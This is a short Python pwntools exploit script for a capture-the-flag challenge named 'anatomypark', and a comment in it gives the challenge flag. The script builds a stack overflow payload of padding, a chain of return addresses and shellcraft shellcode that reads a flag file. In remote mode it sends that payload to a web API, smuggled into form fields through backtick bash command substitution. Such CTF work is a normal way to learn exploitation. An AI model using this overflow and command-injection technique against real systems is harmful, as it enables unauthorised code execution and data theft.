from pwn import *
import requests

LOCAL_BINARY = './validator'

context.binary = LOCAL_BINARY

# KAIZEN{it_g0es_w1thout_saying_th4t_the_rickest_r1ck_would_have_th3_mortiest_m0rty}

ADDR_RET = 0x08048588
ADDR_POP_RET = 0x0804837d

def payload(a=None, b=None):
    if args['REMOTE']:
        def enc(x):
            return "`bash -c 'echo -ne \"" + ''.join("\\x" + hex(ord(c))[2:] for c in x) + "\"'`"
        a = enc(a)
        b = enc(b)
        r = requests.post('https://anatomypark.kaizen-ctf.com/api/v1/validateInviteCode', data={'name' : a, 'invite' : b})
        print r.text
    elif args['GDB']:
        proc = gdb.debug([LOCAL_BINARY, a, b])
        print proc.recvall()
        proc.close()
    else:
        proc = process([LOCAL_BINARY, a, b])
        print proc.recvall()
        proc.close()

def exploit():
    sc = asm(shellcraft.cat('/home/anatomypark/flag.txt') + shellcraft.exit(0))
    a = sc
    b = 'A' * 108 + p32(ADDR_RET) * 0x31 + p32(ADDR_POP_RET)
    payload(a, b)

if __name__ == '__main__':
    exploit()
